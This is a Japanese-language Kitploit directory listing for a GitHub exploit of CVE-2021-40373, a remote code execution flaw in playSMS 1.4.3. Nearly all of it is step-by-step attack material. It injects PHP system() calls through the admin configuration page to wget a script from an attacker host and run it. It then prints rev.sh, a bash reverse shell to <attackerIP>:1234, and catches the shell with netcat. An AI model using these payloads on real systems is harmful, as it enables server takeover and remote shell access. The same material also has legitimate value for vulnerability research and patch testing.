Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-40373 — CVE-2021-40373 - リモートコード実行 | Kitploit
ツール/GitHubGitHub/maikroservice/cve-2021-40373
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmaikroservice/cve-2021-40373

CVE-2021-40373

CVE-2021-40373 - リモートコード実行

リポジトリを見る
114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-playsms

playsms 1.4.3 には、潜在的な攻撃者がリモートコード実行を可能にする脆弱性があります。

RCE(シェル)を再現する方法:

https://playsms.org/

  • docker pull playsms/playsms:1.4.3
  • docker run -d -p 80:80 playsms/playsms
  • admin:admin でログインする
  • http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • 攻撃者のマシンで悪意のある bash ファイルをホストする
  • マシン上で wget を使用して悪意のあるファイルをダウンロードする
  • <?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?> と入力する
  • 情報を保存する(入力ボックスからは消えますが、動作します)
  • http://127.0.0.1/index.php?app=main&inc=core_welcome
  • ページを再読み込みする http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • シェルスクリプトを chmod で実行権限を付与して実行する - <?php system("chmod +x rev.sh && ./rev.sh") ?>)
  • 保存し、* http://127.0.0.1/index.php?app=main&inc=core_welcome にアクセスしてコード実行を得る
  • ローカルの netcat ハンドラーを実行してリモートシェルをキャッチする

rev.sh

root@kitploit:~
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
ツールをダウンロード